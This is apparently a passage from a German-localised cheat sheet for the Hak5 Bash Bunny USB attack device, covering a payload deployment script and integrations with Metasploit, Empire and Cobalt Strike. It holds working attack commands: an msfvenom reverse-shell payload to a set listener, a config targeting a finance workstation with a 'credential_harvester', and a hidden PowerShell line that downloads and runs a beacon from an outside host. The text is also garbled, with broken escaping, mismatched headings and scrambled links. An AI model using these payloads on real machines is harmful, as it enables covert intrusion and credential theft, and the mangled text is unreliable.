Zum Inhalt springen
1337skills 1337skills - Referenzen

Bash Bunny Cheat Sheet

Translation: # Bash Bunny Spickzettel EOF

# Add deployment summaries
for deployment_file in "$RESULTS_DIR"/deployment_*.json; do
    if [ -f "$deployment_file" ]; then
        local payload_name=$(jq -r '.payload_name' "$deployment_file")
        local switch_pos=$(jq -r '.switch_position' "$deployment_file")
        local target=$(jq -r '.target_description' "$deployment_file")
        local deploy_time=$(jq -r '.deployment_time' "$deployment_file")

        cat >> "$report_file" << EOF
<div class="deployment success">
    <h3>Deployment: $payload_name</h3>
    <p><strong>Switch Position:</strong> $switch_pos</p>
    <p><strong>Target:</strong> $target</p>
    <p><strong>Deployment Time:</strong> $deploy_time</p>
</div>

EOF fi done

cat >> "$report_file" << 'EOF'
EOF 
log_message "Deployment report generated: $report_file"

\\}

Function to clean up old results

cleanup_results() \\{ local retention_days=“$1”

if [ -z "$retention_days" ]; then
    retention_days=30
fi

log_message "Cleaning up results older than $retention_days days"

# Clean up old deployment files
find "$RESULTS_DIR" -name "deployment_*.json" -mtime +$retention_days -delete
find "$RESULTS_DIR" -name "collection_*" -type d -mtime +$retention_days -exec rm -rf \\\\{\\\\} \;

# Clean up old logs
find "$(dirname "$LOG_FILE")" -name "*.log" -mtime +$retention_days -delete

log_message "Cleanup completed"

\\}

Main deployment workflow

main_deployment() \\{ local config_file=“$1”

if [ ! -f "$config_file" ]; then
    log_message "Configuration file not found: $config_file"
    return 1
fi

log_message "Starting automated deployment workflow"

# Read configuration
source "$config_file"

# Deploy payloads
for i in $(seq 1 2); do
    local payload_var="PAYLOAD_SWITCH_$i"
    local target_var="TARGET_SWITCH_$i"
    local timeout_var="TIMEOUT_SWITCH_$i"

    local payload_name="$\\\\{!payload_var\\\\}"
    local target_desc="$\\\\{!target_var\\\\}"
    local timeout="$\\\\{!timeout_var\\\\}"

    if [ -n "$payload_name" ]; then
        if deploy_payload "$payload_name" "$i" "$target_desc"; then
            # Wait for manual execution or auto-execute
            if [ "$AUTO_EXECUTE" = "true" ]; then
                sleep 5  # Allow time for deployment
                execute_payload "$i" "$timeout"
                collect_results "$i"
            fi
        fi
    fi
done

# Generate report
generate_report

# Cleanup if configured
if [ "$AUTO_CLEANUP" = "true" ]; then
    cleanup_results "$RETENTION_DAYS"
fi

log_message "Automated deployment workflow completed"

\\}

Create default configuration

create_default_config() \\{ cat > “$DEPLOYMENT_CONFIG” << ‘EOF’

Bash Bunny Deployment Configuration

Payload assignments

PAYLOAD_SWITCH_1=“credential_harvester” PAYLOAD_SWITCH_2=“network_recon”

Target descriptions

TARGET_SWITCH_1=“Windows 10 workstation - Finance department” TARGET_SWITCH_2=“Ubuntu server - Development environment”

Execution timeouts (seconds)

TIMEOUT_SWITCH_1=300 TIMEOUT_SWITCH_2=600

Automation settings

AUTO_EXECUTE=false AUTO_CLEANUP=true RETENTION_DAYS=30 EOF

log_message "Default configuration created: $DEPLOYMENT_CONFIG"

\\}

Command line interface

case “$1” in “deploy”) deploy_payload “$2” “$3” “$4” ;; “execute”) execute_payload “$2” “$3” ;; “collect”) collect_results “$2” ;; “report”) generate_report ;; “cleanup”) cleanup_results “$2” ;; “workflow”) main_deployment “$2” ;; “config”) create_default_config ;; *) echo “Usage: $0 [command] [args]” echo “Commands:” echo ” deploy - Deploy payload” echo ” execute [timeout] - Execute payload” echo ” collect - Collect results” echo ” report - Generate report” echo ” cleanup [days] - Clean up old results” echo ” workflow [config] - Run full workflow” echo ” config - Create default config” ;; esac


## Integration with Other Tools

### Metasploit Integration
```bash
# Generate Metasploit payloads for Bash Bunny
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > /root/udisk/payloads/switch1/payload.exe

# Bash Bunny payload to execute Metasploit payload
cat > /root/udisk/payloads/switch1/payload.txt << 'EOF'
ATTACKMODE HID STORAGE
DELAY 3000
RUN WIN "E:\\payload.exe"
EOF

Empire Integration

# Generate Empire stager for Bash Bunny
# In Empire console:
# (Empire) > usestager windows/launcher_bat
# (Empire: stager/windows/launcher_bat) > set Listener http
# (Empire: stager/windows/launcher_bat) > generate

# Copy generated stager to Bash Bunny storage
cp empire_stager.bat /root/udisk/payloads/switch1/
```### Cobalt Strike Integration
```bash
# Generate Cobalt Strike beacon for Bash Bunny
# In Cobalt Strike:
# Attacks -> Packages -> Windows Executable (S)
# Save as beacon.exe

# Bash Bunny payload for Cobalt Strike
cat > /root/udisk/payloads/switch1/payload.txt << 'EOF'
ATTACKMODE HID STORAGE
DELAY 3000
RUN WIN "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"& \\\\{(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.100/beacon.exe', 'C:\\Windows\\Temp\\beacon.exe'); Start-Process 'C:\\Windows\\Temp\\beacon.exe'\\\\}\""
EOF
```## Fehlerbehebung
```bash
# Check USB connection
lsusb|grep "Hak5"

# Reset USB subsystem
echo 0 > /sys/bus/usb/devices/usb1/authorized
echo 1 > /sys/bus/usb/devices/usb1/authorized

# Check dmesg for errors
dmesg|tail -20
```### Häufige Probleme
```bash
# Check payload syntax
bash -n /root/udisk/payloads/switch1/payload.txt

# Check file permissions
chmod +x /root/udisk/payloads/switch1/payload.txt

# Test payload manually
cd /root/udisk/payloads/switch1/
bash payload.txt
```#### Gerät nicht erkannt
```bash
# Check LED control
echo "LED SETUP" > /dev/ttyGS0
echo "LED FINISH" > /dev/ttyGS0

# Reset LED controller
systemctl restart led-controller
```#### Payload wird nicht ausgeführt
```bash
# Check storage image
file /root/udisk/images/payload.img

# Mount storage image manually
mkdir -p /mnt/test
mount -o loop /root/udisk/images/payload.img /mnt/test
ls -la /mnt/test
umount /mnt/test
```#### LED funktioniert nicht
```bash
# Optimize payload execution speed
# Use DELAY sparingly
# Combine multiple STRING commands
# Use RUN for single commands

# Monitor system resources
top
free -h
df -h

# Clean up temporary files
rm -rf /tmp/*
rm -rf /var/tmp/*
```#### Speichermodus-Probleme
https://docs.hak5.org/bash-bunny/##

# Leistungsoptimierung
https://forums.hak5.org/#

# Ressourcen
https://github.com/hak5/bashbunny-payloads- [Bash Bunny Offizielle Dokumentation](https://www.sans.org/white-papers/physical-penetration-testing/)https://www.nist.gov/publications/guidelines-media-sanitization- [Hak5 Community-Foren](https://github.com/trustedsec/social-engineer-toolkit)https://owasp.org/www-project-physical-security-testing-guide/- [Bash Bunny Payload-Repository](